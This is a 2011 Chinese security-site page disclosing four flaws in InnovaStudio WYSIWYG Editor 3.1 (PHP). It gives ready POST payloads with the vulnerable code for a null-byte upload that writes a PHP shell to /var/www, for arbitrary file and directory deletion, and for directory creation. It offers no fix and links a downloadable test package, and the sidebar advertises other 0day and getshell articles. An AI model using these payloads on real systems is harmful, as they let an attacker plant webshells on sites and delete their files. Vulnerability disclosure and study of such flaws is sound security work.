首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
InnovaStudio WYSIWYG Editor 3.1 【php版】任意上传文件漏洞
来源:vfocus.net 作者:Abing 发布时间:2011-06-30  

漏洞一 任意上传文件[magic_quotes_gpc=Off]
漏洞文件:assetmanager.php
POST inpCurrFolder2=/var/www/shell.php%00
漏洞代码:第42行
if(isset($_FILES["File1"]))
  {
  if(isset($_POST["inpCurrFolder2"]))$currFolder=$_POST['inpCurrFolder2']; //目录可以构造magic_quotes_gpc=off时可写任意文件
  if(isset($_REQUEST["inpFilter"]))$ffilter=$_REQUEST["inpFilter"];

  if($MaxFileSize && ($_FILES['File1']['size'] > $MaxFileSize))
    {
    $sMsg = "The file exceeds the maximum size allowed.";
    }
  else if(!isTypeAllowed($_FILES['File1']['name']))
    {
    $sMsg = "The File Type is not allowed.";
    }
  else if (move_uploaded_file($_FILES['File1']['tmp_name'], $currFolder."/".basename($_FILES['File1']['name'])))
    {
    $sMsg = "";
    $sUploadedFile=$_FILES['File1']['name'];
    @chmod($currFolder."/".basename($_FILES['File1']['name']), 0644);
    }
  else
    {
    $sMsg = "Upload failed.";
    }
  }
-------------------

2.访问权限未设置导致任意删除文件
漏洞文件:assetmanager.php
[POST] inpFileToDelete=/var/www/index.php
漏洞代码:第72行
if(isset($_POST["inpFileToDelete"]))
  {
  $filename=pathinfo($_POST["inpFileToDelete"]);
  $filename=$filename['basename'];
  if($filename!="")
    unlink($currFolder . "/" . $filename);
  $sMsg = "";
  }
-------------------
3.访问权限未设置导致任意目录删漏洞
漏洞文件:folderdel_.php
[POST]inpCurrFolder=/var/www/upload/
漏洞代码 第3行
if(isset($_POST["inpCurrFolder"]))
  {
  $sDestination = pathinfo($_POST["inpCurrFolder"]);

  //DELETE ALL FILES IF FOLDER NOT EMPTY
    $dir = $_POST["inpCurrFolder"];
    $handle = opendir($dir);
    while($file = readdir($handle)) if($file != "." && $file != "..") unlink($dir . "/" . $file);
    closedir($handle);

  if(rmdir($_POST["inpCurrFolder"])==0)
    $sMsg = "";
  else
    $sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
  }

-------------------
4.访问权限未设置导致任意目录创建
漏洞文件:foldernew.php
[POST] inpCurrFolder=/var/www/&inpNewFolderName=123
漏洞代码:第3行
if(isset($_POST["inpNewFolderName"]))
  {
  $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];

  if(is_dir($sFolder)==1)
    {//folder already exist
    $sMsg = "<script>document.write(getTxt('Folder already exists.'))</script>";
    }
  else
    {
    //if(mkdir($sFolder))
    if(mkdir($sFolder,0755))

 

InnovaStudio WYSIWYG Editor 3.1-Xday测试.rar:http://dl.dbank.com/c0ed4bc00v

By:Abing



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Discuz! X2 SQL注射漏洞,支持Un
·风讯 4.0之前所有版本通杀拿SHEL
·vBseo(百度推广)远程执行漏洞
·掏帝管理平台安全漏洞
·易通企业网站最新0DAY漏洞
·某企业站系统SQL注入批量拿shell
·Modoer 1.2.5 注入0day
·网奇CWMS企业网站管理系统3.0编
·Nuclear-Blog v4.0 留言板的 XSS
·dedecms 5.6 RSS订阅页面注入漏
·DeDecms xss 通杀0day 附getshel
·极速安康学校网站程序 v3.1.1 co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved